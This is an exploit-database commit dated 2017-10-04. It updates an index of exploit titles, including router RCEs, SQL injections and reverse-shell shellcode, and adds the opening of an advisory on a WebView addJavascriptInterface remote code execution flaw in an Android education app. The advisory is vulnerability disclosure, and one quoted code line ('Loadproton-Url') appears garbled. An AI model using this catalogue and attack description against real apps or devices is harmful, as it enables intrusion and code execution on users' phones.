DB: 2017-10-04

22 new exploits All browsers - Crash Microsoft Windows Kernel win32k.sys TTF Font Processing - Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath) Microsoft Windows Kernel win32k.sys TTF Font Processing - Out-of-Bounds Read with Malformed _glyf_ Table (win32k!fsc_CalcGrayRow) Microsoft Windows Kernel - win32k.sys .TTF Font Processing - Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath) Microsoft Windows Kernel - .win32k.sys TTF Font Processing Out-of-Bounds Read with Malformed 'glyf' Table (win32k!fsc_CalcGrayRow) NoMachine 5.3.9 - Privilege Escalation Microsoft Word 2007 (x86) - Information Disclosure Apple Mac OS X + Safari - Local Javascript Quarantine Bypass Australian Education App - Remote Code Execution CenturyLink ZyXEL PK5001Z Router - Root Remote Code Execution Trend Micro OfficeScan 11.0/XG (12.0) - MITM Remote Code Execution UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Unauthenticated Root Remote Code Execution Web interface for DNSmasq / Mikrotik - SQL Injection Web Interface for DNSmasq / Mikrotik - SQL Injection Zyxel P-660HW-61 Firmware < 3.40(PE.11)C0 Router - Local File Inclusion Uniview NVR - Password Disclosure Nuevomailer < 6.0 - SQL Injection IBM Informix Dynamic Server - Code Injection / Remote Code Execution WordPress Plugin Sabai Discuss - Cross-Site Scripting Tilde CMS 1.01 - Multiple Vulnerabilities VACRON VIG-US731VE 1.0.18-09-B727 IP Camera - Authentication Bypass JoySale 2.2.1 - Arbitrary File Upload AirMaster 3000M - Multiple Vulnerabilities RPi Cam Control < 6.3.14 - Remote Command Execution iTech Movie Script 7.51 - SQL Injection CMS Web-Gooroo < 1.141 - Multiple Vulnerabilities PHP-SecureArea < 2.7 - Multiple Vulnerabilities Humax Wi-Fi Router HG100R 2.0.6 - Authentication Bypass Fiberhome AN5506-04-F - Command Injection
2017-10-04 05:01:32 +00:00 · 2017-10-04 05:01:32 +00:00 · 4df0e06052
commit 4df0e06052
parent ecfeb57577
23 changed files with 1777 additions and 4 deletions
--- a/files.csv
+++ b/files.csv
@ -1527,7 +1527,7 @@ id,file,description,date,author,platform,type,port
 12477,platforms/windows/dos/12477.txt,"Google Chrome 4.1.249.1064 - Remote Memory Corrupt",2010-05-01,eidelweiss,windows,dos,0
 12482,platforms/windows/dos/12482.py,"TFTPGUI - Long Transport Mode Overflow",2010-05-02,"Jeremiah Talamantes",windows,dos,0
 12487,platforms/windows/dos/12487.html,"Apple Safari 4.0.5 - 'JavaScriptCore.dll' Stack Exhaustion",2010-05-03,"Mathias Karlsson",windows,dos,0
-12491,platforms/multiple/dos/12491.html,"All browsers - Crash",2010-05-03,"Inj3ct0r Team",multiple,dos,0
+12491,platforms/multiple/dos/12491.html,"All browsers - Crash",2010-05-03,Inj3ct0r,multiple,dos,0
 12492,platforms/windows/dos/12492.html,"Mozilla Firefox 3.6.3 - Fork Bomb (Denial of Service)",2010-05-03,Dr_IDE,windows,dos,0
 12493,platforms/multiple/dos/12493.html,"All Browsers - Long Unicode Denial of Service (PoC)",2010-05-03,Dr_IDE,multiple,dos,0
 12494,platforms/windows/dos/12494.pl,"Winamp 5.572 - Local Crash (PoC)",2010-05-03,R3d-D3V!L,windows,dos,0
@ -5674,8 +5674,8 @@ id,file,description,date,author,platform,type,port
 42741,platforms/windows/dos/42741.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetGlyphOutline' Pool Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
 42742,platforms/windows/dos/42742.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetPhysicalMonitorDescription' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
 42743,platforms/windows/dos/42743.cpp,"Microsoft Windows Kernel - 'nt!NtSetIoCompletion / nt!NtRemoveIoCompletion' Pool Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
-42744,platforms/windows/dos/42744.txt,"Microsoft Windows Kernel win32k.sys TTF Font Processing - Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath)",2017-09-18,"Google Security Research",windows,dos,0
+42744,platforms/windows/dos/42744.txt,"Microsoft Windows Kernel - win32k.sys .TTF Font Processing - Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath)",2017-09-18,"Google Security Research",windows,dos,0
-42746,platforms/windows/dos/42746.txt,"Microsoft Windows Kernel win32k.sys TTF Font Processing - Out-of-Bounds Read with Malformed _glyf_ Table (win32k!fsc_CalcGrayRow)",2017-09-18,"Google Security Research",windows,dos,0
+42746,platforms/windows/dos/42746.txt,"Microsoft Windows Kernel - .win32k.sys TTF Font Processing Out-of-Bounds Read with Malformed 'glyf' Table (win32k!fsc_CalcGrayRow)",2017-09-18,"Google Security Research",windows,dos,0
 42748,platforms/windows/dos/42748.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiEngCreatePalette' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
 42749,platforms/windows/dos/42749.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiDoBanding' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
 42758,platforms/windows/dos/42758.txt,"Microsoft Edge 38.14393.1066.0 - Memory Corruption with Partial Page Loading",2017-09-19,"Google Security Research",windows,dos,0
@ -9247,6 +9247,7 @@ id,file,description,date,author,platform,type,port
 42454,platforms/macos/local/42454.txt,"Xamarin Studio for Mac 6.2.1 (build 3) / 6.3 (build 863) - Privilege Escalation",2017-08-14,Securify,macos,local,0
 42455,platforms/windows/local/42455.py,"ALLPlayer 7.4 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0
 42456,platforms/windows/local/42456.py,"Internet Download Manager 6.28 Build 17 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0
 42460,platforms/osx/local/42460.py,"NoMachine 5.3.9 - Privilege Escalation",2017-08-09,"Daniele Linguaglossa",osx,local,0
 42521,platforms/windows/local/42521.py,"Easy DVD Creater 2.5.11 - Buffer Overflow (SEH)",2017-08-19,"Anurag Srivastava",windows,local,0
 42536,platforms/windows/local/42536.py,"Disk Pulse Enterprise 9.9.16 - 'Import Command' Buffer Overflow",2017-08-22,"Anurag Srivastava",windows,local,0
 42537,platforms/windows/local/42537.txt,"PDF-XChange Viewer 2.5 Build 314.0 - Remote Code Execution",2017-08-21,"Daniele Votta",windows,local,0
@ -9271,8 +9272,10 @@ id,file,description,date,author,platform,type,port
 42890,platforms/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,windows,local,0
 42918,platforms/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Buffer Overflow",2017-09-28,"Touhid M.Shaikh",windows,local,0
 42921,platforms/windows/local/42921.py,"Dup Scout Enterprise 10.0.18 - 'Import Command' Buffer Overflow",2017-09-29,"Touhid M.Shaikh",windows,local,0
 42930,platforms/windows/local/42930.txt,"Microsoft Word 2007 (x86) - Information Disclosure",2017-09-30,"Eduardo Braun Prado",windows,local,0
 42936,platforms/linux/local/42936.txt,"UCOPIA Wireless Appliance < 5.1.8 - Privilege Escalation",2017-10-02,Sysdream,linux,local,0
 42937,platforms/linux/local/42937.txt,"UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape",2017-10-02,Sysdream,linux,local,0
 42948,platforms/osx/local/42948.txt,"Apple Mac OS X + Safari - Local Javascript Quarantine Bypass",2017-07-15,"Filippo Cavallarin",osx,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15817,6 +15820,7 @@ id,file,description,date,author,platform,type,port
 42282,platforms/windows/remote/42282.rb,"Veritas/Symantec Backup Exec - SSL NDMP Connection Use-After-Free (Metasploit)",2017-06-29,Metasploit,windows,remote,10000
 42283,platforms/java/remote/42283.rb,"ActiveMQ < 5.14.0 - Web Shell Upload (Metasploit)",2017-06-29,Metasploit,java,remote,0
 42288,platforms/android/remote/42288.txt,"BestSafe Browser - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0
 42289,platforms/android/remote/42289.txt,"Australian Education App - Remote Code Execution",2017-06-30,intern0t,android,remote,0
 42296,platforms/unix/remote/42296.rb,"GoAutoDial 3.3 - Authentication Bypass / Command Injection (Metasploit)",2017-07-05,Metasploit,unix,remote,443
 42297,platforms/php/remote/42297.py,"Lepide Auditor Suite - 'createdb()' Web Console Database Injection / Remote Code Execution",2017-07-05,mr_me,php,remote,7778
 42303,platforms/multiple/remote/42303.txt,"Yaws 1.91 - Remote File Disclosure",2017-07-07,hyp3rlinx,multiple,remote,0
@ -15829,6 +15833,7 @@ id,file,description,date,author,platform,type,port
 42349,platforms/android/remote/42349.txt,"SKILLS.com.au Industry App - MITM Remote Code Execution",2017-07-20,intern0t,android,remote,0
 42350,platforms/android/remote/42350.txt,"Virtual Postage (VPA) - MITM Remote Code Execution",2017-07-20,intern0t,android,remote,0
 42354,platforms/win_x86-64/remote/42354.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-07-24,redr2e,win_x86-64,remote,0
 42355,platforms/hardware/remote/42355.c,"CenturyLink ZyXEL PK5001Z Router - Root Remote Code Execution",2017-07-24,oxagast,hardware,remote,0
 42369,platforms/cgi/remote/42369.rb,"IPFire < 2.19 Update Core 110 - Remote Code Execution (Metasploit)",2017-07-24,Metasploit,cgi,remote,0
 42370,platforms/unix/remote/42370.rb,"VICIdial 2.9 RC 1 to 2.13 RC1 - user_authorization Unauthenticated Command Execution (Metasploit)",2017-07-24,Metasploit,unix,remote,0
 42395,platforms/windows/remote/42395.py,"DiskBoss Enterprise 8.2.14 - Buffer Overflow",2017-07-30,"Ahmad Mahfouz",windows,remote,0
@ -15878,8 +15883,10 @@ id,file,description,date,author,platform,type,port
 42793,platforms/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,multiple,remote,5858
 42806,platforms/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization",2017-09-27,SlidingWindow,java,remote,0
 42888,platforms/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",hardware,remote,0
 42891,platforms/windows/remote/42891.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - MITM Remote Code Execution",2017-09-28,hyp3rlinx,windows,remote,0
 42928,platforms/windows/remote/42928.py,"Sync Breeze Enterprise 10.0.28 - Buffer Overflow",2017-09-30,"Owais Mehtab",windows,remote,0
 42938,platforms/linux/remote/42938.rb,"Qmail SMTP - Bash Environment Variable Injection (Metasploit)",2017-10-02,Metasploit,linux,remote,0
 42949,platforms/linux/remote/42949.txt,"UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Unauthenticated Root Remote Code Execution",2017-10-02,agix,linux,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -37297,7 +37304,7 @@ id,file,description,date,author,platform,type,port
 39883,platforms/php/webapps/39883.txt,"WordPress Plugin Simple Backup 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80
 39813,platforms/php/webapps/39813.txt,"CakePHP Framework 3.2.4 - IP Spoofing",2016-05-16,"Dawid Golunski",php,webapps,80
 39816,platforms/php/webapps/39816.php,"eXtplorer 2.1.9 - '.ZIP' Directory Traversal",2016-05-16,hyp3rlinx,php,webapps,0
-39817,platforms/php/webapps/39817.php,"Web interface for DNSmasq / Mikrotik - SQL Injection",2016-05-16,hyp3rlinx,php,webapps,0
+39817,platforms/php/webapps/39817.php,"Web Interface for DNSmasq / Mikrotik - SQL Injection",2016-05-16,hyp3rlinx,php,webapps,0
 39821,platforms/python/webapps/39821.txt,"Web2py 2.14.5 - Multiple Vulnerabilities",2016-05-16,"Narendra Bhati",python,webapps,0
 39822,platforms/multiple/webapps/39822.rb,"Meteocontrol WEB’log - Admin Password Disclosure (Metasploit)",2016-05-17,"Karn Ganeshen",multiple,webapps,0
 39837,platforms/java/webapps/39837.txt,"SAP xMII 15.0 - Directory Traversal",2016-05-17,ERPScan,java,webapps,0
@ -38265,6 +38272,7 @@ id,file,description,date,author,platform,type,port
 41989,platforms/php/webapps/41989.txt,"BanManager WebUI 1.5.8 - PHP Code Injection",2017-05-10,HaHwul,php,webapps,0
 41990,platforms/php/webapps/41990.html,"Gongwalker API Manager 1.1 - Cross-Site Request Forgery",2017-05-10,HaHwul,php,webapps,0
 41997,platforms/php/webapps/41997.txt,"CMS Made Simple 2.1.6 - Multiple Vulnerabilities",2017-05-10,"Osanda Malith",php,webapps,0
 41998,platforms/hardware/webapps/41998.txt,"Zyxel P-660HW-61 Firmware < 3.40(PE.11)C0 Router - Local File Inclusion",2017-05-02,ReverseBrain,hardware,webapps,0
 42003,platforms/php/webapps/42003.txt,"PlaySMS 1.4 - 'sendfromfile.php' Remote Code Execution / Unrestricted File Upload",2017-05-14,"Touhid M.Shaikh",php,webapps,80
 42004,platforms/php/webapps/42004.txt,"Mailcow 0.14 - Cross-Site Request Forgery",2017-05-15,hyp3rlinx,php,webapps,0
 42005,platforms/php/webapps/42005.txt,"Admidio 3.2.8 - Cross-Site Request Forgery",2017-04-28,"Faiz Ahmed Zaidi",php,webapps,0
@ -38316,10 +38324,12 @@ id,file,description,date,author,platform,type,port
 42133,platforms/php/webapps/42133.txt,"Robert 0.5 - Multiple Vulnerabilities",2017-06-07,"Cyril Vallicari",php,webapps,0
 42143,platforms/php/webapps/42143.txt,"Craft CMS 2.6 - Cross-Site Scripting",2017-06-08,"Ahsan Tahir",php,webapps,0
 42149,platforms/linux/webapps/42149.py,"IPFire 2.19 - Remote Code Execution",2017-06-09,0x09AL,linux,webapps,0
 42150,platforms/hardware/webapps/42150.py,"Uniview NVR - Password Disclosure",2017-06-09,B1t,hardware,webapps,0
 42151,platforms/php/webapps/42151.txt,"eCom Cart 1.3 - SQL Injection",2017-06-10,"Alperen Eymen Ozcan",php,webapps,0
 42153,platforms/windows/webapps/42153.py,"EFS Easy Chat Server 3.1 - Password Disclosure",2017-06-09,"Aitezaz Mohsin",windows,webapps,0
 42154,platforms/windows/webapps/42154.py,"EFS Easy Chat Server 3.1 - Password Reset",2017-06-09,"Aitezaz Mohsin",windows,webapps,0
 42156,platforms/php/webapps/42156.txt,"PaulShop - SQL Injection",2017-06-10,Se0pHpHack3r,php,webapps,0
 42164,platforms/php/webapps/42164.txt,"Nuevomailer < 6.0 - SQL Injection",2017-06-09,"Oleg Boytsev",php,webapps,0
 42166,platforms/php/webapps/42166.txt,"WordPress Plugin WP-Testimonials < 3.4.1 - SQL Injection",2017-06-03,"Dimitrios Tsagkarakis",php,webapps,0
 42167,platforms/php/webapps/42167.txt,"Real Estate Classifieds Script - SQL Injection",2017-06-12,EziBilisim,php,webapps,0
 42172,platforms/php/webapps/42172.txt,"WordPress Plugin WP Jobs < 1.5 - SQL Injection",2017-06-11,"Dimitrios Tsagkarakis",php,webapps,0
@ -38327,6 +38337,7 @@ id,file,description,date,author,platform,type,port
 42178,platforms/hardware/webapps/42178.py,"Aerohive HiveOS 5.1r5 < 6.1r5 - Remote Code Execution",2017-05-22,Ike-Clinton,hardware,webapps,0
 42184,platforms/aspx/webapps/42184.txt,"KBVault MySQL 0.16a - Arbitrary File Upload",2017-06-14,"Fatih Emiral",aspx,webapps,0
 42185,platforms/php/webapps/42185.txt,"Joomla! Component JoomRecipe 1.0.3 - SQL Injection",2017-06-15,EziBilisim,php,webapps,0
 42187,platforms/linux/webapps/42187.py,"IBM Informix Dynamic Server - Code Injection / Remote Code Execution",2017-06-16,IMgod,linux,webapps,0
 42192,platforms/hardware/webapps/42192.sh,"iBall Baton iB-WRA150N - Unauthenticated DNS Change",2017-06-16,"Todor Donev",hardware,webapps,0
 42193,platforms/php/webapps/42193.txt,"nuevoMailer 6.0 - SQL Injection",2017-06-09,"Oleg Boytsev",php,webapps,0
 42194,platforms/hardware/webapps/42194.sh,"UTstarcom WA3002G4 - Unauthenticated DNS Change",2017-06-17,"Todor Donev",hardware,webapps,0
@ -38353,6 +38364,7 @@ id,file,description,date,author,platform,type,port
 42312,platforms/windows/webapps/42312.txt,"Pelco VideoXpert 1.12.105 - Information Disclosure",2017-07-10,LiquidWorm,windows,webapps,0
 42313,platforms/hardware/webapps/42313.txt,"DataTaker DT80 dEX 1.50.012 - Information Disclosure",2017-07-11,"Nassim Asrir",hardware,webapps,0
 42314,platforms/linux/webapps/42314.txt,"NfSen < 1.3.7 / AlienVault OSSIM 4.3.1 - 'customfmt' Command Injection",2017-07-11,"Paul Taylor",linux,webapps,0
 42317,platforms/php/webapps/42317.txt,"WordPress Plugin Sabai Discuss - Cross-Site Scripting",2017-07-12,"Hesam Bazvand",php,webapps,0
 42320,platforms/hardware/webapps/42320.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Authentication Bypass",2017-07-13,LiquidWorm,hardware,webapps,0
 42321,platforms/hardware/webapps/42321.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Cross-Site Request Forgery",2017-07-13,LiquidWorm,hardware,webapps,0
 42322,platforms/hardware/webapps/42322.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Privilege Escalation",2017-07-13,LiquidWorm,hardware,webapps,0
@ -38370,7 +38382,9 @@ id,file,description,date,author,platform,type,port
 42344,platforms/cgi/webapps/42344.rb,"Sonicwall < 8.1.0.2-14sv - 'sitecustomization.cgi' Command Injection (Metasploit)",2017-07-19,xort,cgi,webapps,0
 42346,platforms/cgi/webapps/42346.txt,"Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection",2017-07-19,xort,cgi,webapps,0
 42347,platforms/php/webapps/42347.txt,"Joomla! Component JoomRecipe 1.0.4 - 'search_author' Parameter SQL Injection",2017-07-20,Teng,php,webapps,0
 42348,platforms/php/webapps/42348.txt,"Tilde CMS 1.01 - Multiple Vulnerabilities",2017-07-20,"Raffaele Forte",php,webapps,0
 42351,platforms/php/webapps/42351.txt,"WordPress Plugin IBPS Online Exam 1.0 - SQL Injection / Cross-Site Scripting",2017-07-20,8bitsec,php,webapps,0
 42352,platforms/hardware/webapps/42352.txt,"VACRON VIG-US731VE 1.0.18-09-B727 IP Camera - Authentication Bypass",2017-07-20,Viktoras,hardware,webapps,0
 42353,platforms/php/webapps/42353.txt,"NEC UNIVERGE UM4730 < 11.8 - SQL Injection",2017-07-21,b0x41s,php,webapps,0
 42358,platforms/java/webapps/42358.rb,"ManageEngine Desktop Central 10 Build 100087 - Remote Code Execution (Metasploit)",2017-07-24,"Kacper Szurek",java,webapps,0
 42359,platforms/php/webapps/42359.txt,"PaulShop - SQL Injection / Cross-Site Scripting",2017-07-24,"BTIS Team",php,webapps,0
@ -38389,6 +38403,7 @@ id,file,description,date,author,platform,type,port
 42403,platforms/php/webapps/42403.txt,"VehicleWorkshop - Authentication Bypass",2017-08-01,"Touhid M.Shaikh",php,webapps,0
 42404,platforms/php/webapps/42404.txt,"VehicleWorkshop - Arbitrary File Upload",2017-08-01,"Touhid M.Shaikh",php,webapps,0
 42408,platforms/hardware/webapps/42408.txt,"SOL.Connect ISET-mpp meter 1.2.4.2 - SQL Injection",2017-08-01,"Andy Tan",hardware,webapps,0
 42410,platforms/php/webapps/42410.txt,"JoySale 2.2.1 - Arbitrary File Upload",2017-08-01,"Mutlu Benmutlu",php,webapps,0
 42412,platforms/php/webapps/42412.txt,"Entrepreneur B2B Script - 'pid' Parameter SQL Injection",2017-08-02,"Meisam Monsef",php,webapps,0
 42413,platforms/php/webapps/42413.txt,"Joomla! Component SIMGenealogy 2.1.5 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
 42414,platforms/php/webapps/42414.txt,"Joomla! Component PHP-Bridge 1.2.3 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
@ -38416,6 +38431,8 @@ id,file,description,date,author,platform,type,port
 42447,platforms/php/webapps/42447.txt,"De-Journal 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0
 42448,platforms/php/webapps/42448.txt,"De-Tutor 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0
 42449,platforms/hardware/webapps/42449.html,"RealTime RWR-3G-100 Router - Cross-Site Request Forgery (Change Admin Password)",2017-08-12,"Touhid M.Shaikh",hardware,webapps,0
 42450,platforms/hardware/webapps/42450.php,"AirMaster 3000M - Multiple Vulnerabilities",2017-08-12,"Mr.8Th BiT",hardware,webapps,0
 42452,platforms/php/webapps/42452.py,"RPi Cam Control < 6.3.14 - Remote Command Execution",2017-08-14,"Alexander Korznikov",php,webapps,0
 42458,platforms/php/webapps/42458.txt,"AdvanDate iCupid Dating Software 12.2 - SQL Injection",2017-08-15,"Ihsan Sencan",php,webapps,0
 42457,platforms/php/webapps/42457.txt,"ClipBucket 2.8.3 - Multiple Vulnerabilities",2017-08-15,bRpsd,php,webapps,0
 42461,platforms/php/webapps/42461.txt,"Online Quiz Project 1.0 - SQL Injection",2017-08-17,"Ihsan Sencan",php,webapps,0
@ -38449,6 +38466,7 @@ id,file,description,date,author,platform,type,port
 42513,platforms/php/webapps/42513.txt,"iTech Multi Vendor Script 6.63 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
 42514,platforms/php/webapps/42514.txt,"iTech Dating Script 3.40 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
 42515,platforms/php/webapps/42515.txt,"iTech Job Script 9.27 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
 42516,platforms/php/webapps/42516.txt,"iTech Movie Script 7.51 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
 42524,platforms/php/webapps/42524.txt,"Joomla! Component Flip Wall 8.0 - 'wallid' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
 42525,platforms/php/webapps/42525.txt,"Joomla! Component Sponsor Wall 8.0 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
 42526,platforms/php/webapps/42526.txt,"PHP Classifieds Script 5.6.2 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
@ -38472,6 +38490,7 @@ id,file,description,date,author,platform,type,port
 42573,platforms/php/webapps/42573.txt,"PHP Search Engine 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0
 42574,platforms/php/webapps/42574.txt,"Flash Poker 2.0 - 'game' Parameter SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0
 42575,platforms/php/webapps/42575.txt,"Login-Reg Members Management PHP 1.0 - Arbitrary File Upload",2017-08-28,"Ihsan Sencan",php,webapps,0
 42577,platforms/php/webapps/42577.txt,"CMS Web-Gooroo < 1.141 - Multiple Vulnerabilities",2017-06-01,Kaimi,php,webapps,0
 42578,platforms/php/webapps/42578.txt,"Schools Alert Management Script - Authentication Bypass",2017-08-28,"Ali BawazeEer",php,webapps,0
 42579,platforms/json/webapps/42579.txt,"NethServer 7.3.1611 - Cross-Site Request Forgery / Cross-Site Scripting",2017-08-28,LiquidWorm,json,webapps,0
 42580,platforms/json/webapps/42580.html,"NethServer 7.3.1611 - Cross-Site Request Forgery (Create User / Enable SSH Access)",2017-08-28,LiquidWorm,json,webapps,0
@ -38485,6 +38504,7 @@ id,file,description,date,author,platform,type,port
 42590,platforms/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - Arbitrary File Download",2017-08-30,"Ihsan Sencan",php,webapps,0
 42591,platforms/php/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,php,webapps,0
 42592,platforms/php/webapps/42592.html,"Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)",2017-08-30,"Ali BawazeEer",php,webapps,0
 42595,platforms/php/webapps/42595.txt,"PHP-SecureArea < 2.7 - Multiple Vulnerabilities",2017-08-30,Cryo,php,webapps,0
 42596,platforms/php/webapps/42596.txt,"Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
 42597,platforms/php/webapps/42597.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
 42598,platforms/php/webapps/42598.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
@ -38568,6 +38588,7 @@ id,file,description,date,author,platform,type,port
 42729,platforms/hardware/webapps/42729.py,"D-Link DIR8xx Routers - Leak Credentials",2017-09-12,embedi,hardware,webapps,0
 42730,platforms/hardware/webapps/42730.py,"D-Link DIR8xx Routers - Root Remote Code Execution",2017-09-12,embedi,hardware,webapps,0
 42731,platforms/hardware/webapps/42731.sh,"D-Link DIR8xx Routers - Local Firmware Upload",2017-09-12,embedi,hardware,webapps,0
 42732,platforms/hardware/webapps/42732.py,"Humax Wi-Fi Router HG100R 2.0.6 - Authentication Bypass",2017-09-14,Kivson,hardware,webapps,0
 42733,platforms/php/webapps/42733.txt,"PTCEvolution 5.50 - SQL Injection",2017-09-15,"Ihsan Sencan",php,webapps,0
 42734,platforms/php/webapps/42734.txt,"Contact Manager 1.0 - 'femail' Parameter SQL Injection",2017-09-15,"Ihsan Sencan",php,webapps,0
 42736,platforms/asp/webapps/42736.py,"Digirez 3.4 - Cross-Site Request Forgery (Update Admin)",2017-09-18,"Ihsan Sencan",asp,webapps,0
@ -38625,3 +38646,4 @@ id,file,description,date,author,platform,type,port
 42935,platforms/php/webapps/42935.txt,"phpCollab 2.5.1 - SQL Injection",2017-10-02,Sysdream,php,webapps,0
 42939,platforms/jsp/webapps/42939.txt,"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection",2017-10-02,"Marcin Woloszyn",jsp,webapps,0
 42940,platforms/jsp/webapps/42940.txt,"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'documentId' SQL Injection",2017-10-02,"Marcin Woloszyn",jsp,webapps,0
 42947,platforms/hardware/webapps/42947.txt,"Fiberhome AN5506-04-F - Command Injection",2017-10-03,Tauco,hardware,webapps,0
--- a/platforms/android/remote/42289.txt
+++ b/platforms/android/remote/42289.txt
@ -0,0 +1,132 @@
 # Exploit Title: Australian Education App - Remote Code Execution
 # Date: 30/Jun/17
 # Exploit Author: MaXe
 # Vendor Homepage: https://play.google.com/store/apps/details?id=a1.bestsafebrowser2.com
 # Software Link: See APK archive websites
 # Screenshot: Refer to https://www.youtube.com/watch?v=_DCz0OqJzBI
 # Version: v6
 # Tested on: Android 4.1.0 (Google APIs) - API Level 16 - x86
 # CVE : N/A
 Australian Education App - Remote Code Execution (No MITM Required!)
 Version affected: v6
 App Info: The Android application reviewed, according to the developer, comes with all the benefits of "privacy" and "secure browsing", and special configuration for the Australian Education Industry.
 External Links:
 https://play.google.com/store/apps/details?id=a1.bestsafebrowser2.com
 Credits: MaXe (@InterN0T)
 Special Thanks: no1special
 Shouts: SubHacker and the rest of the awesome infosec community.
 -:: The Advisory ::-
 The Android application is vulnerable to Remote Code Execution attacks. This is caused by the following lines of code within the
 \a1\bestsafebrowser2\com\main.java file: (Lines 133 - 140)
    public static String _activity_create(boolean bl) throws Exception {
        main.mostCurrent._activity.RemoveAllViews();
        Common.ProgressDialogShow(main.mostCurrent.activityBA, "Attempting to access the Internet");
        new Phone();
        Object object = mostCurrent;
        _googleurl = "http://www.tsearch.com.au";
        main.mostCurrent._activity.LoadLayout("Start", main.mostCurrent.activityBA);
        object = main.mostCurrent._activity;
 and
 Lines 444 - 450:
    public static String _tr_tick() throws Exception {
        ...
        object = main.mostCurrent._webviewextras1;
        WebViewExtras.clearCache((WebView)main.mostCurrent._webview1.getObject(), true);
        object = main.mostCurrent._webviewextras1;
        WebViewExtras.addJavascriptInterface(main.mostCurrent.activityBA, (WebView)main.mostCurrent._webview1.getObject(), "B4A");
        object = main.mostCurrent._webview1;
        object2 = mostCurrent;
        object.Loadproton-Url(_googleurl);
 In addition to the above, the following App configuration also aids in the exploitability of this issue: (File: AndroidManifest.xml, Line: 3)
    <uses-sdk android:minSdkVersion="5" android:targetSdkVersion="14" />
 If an attacker registers the domain "tsearch.com.au" (it is currently NOT registered) and creates a DNS record for "www.tsearch.com.au" then the attacker has full control over anyone who installs and runs this app. This vulnerability can be used to execute arbitrary Java code in the context of the application.
 In addition to the above, in case someone has registered "tsearch.com.au", then if an attacker performs a MITM attack against "www.tsearch.com.au" by e.g. hijacking the domain name, DNS, IP prefix, or by serving a malicious wireless access point (or hijacking a legitimate one), or by hacking the server at "www.tsearch.com.au", then the attacker can also abuse this vulnerability.
 The root cause of this vulnerability is caused by addJavascriptInterface() within the WebViewer, which in older API versions can be used to execute arbitrary Java code by using reflection to access public methods with attacker provided JavaScript.
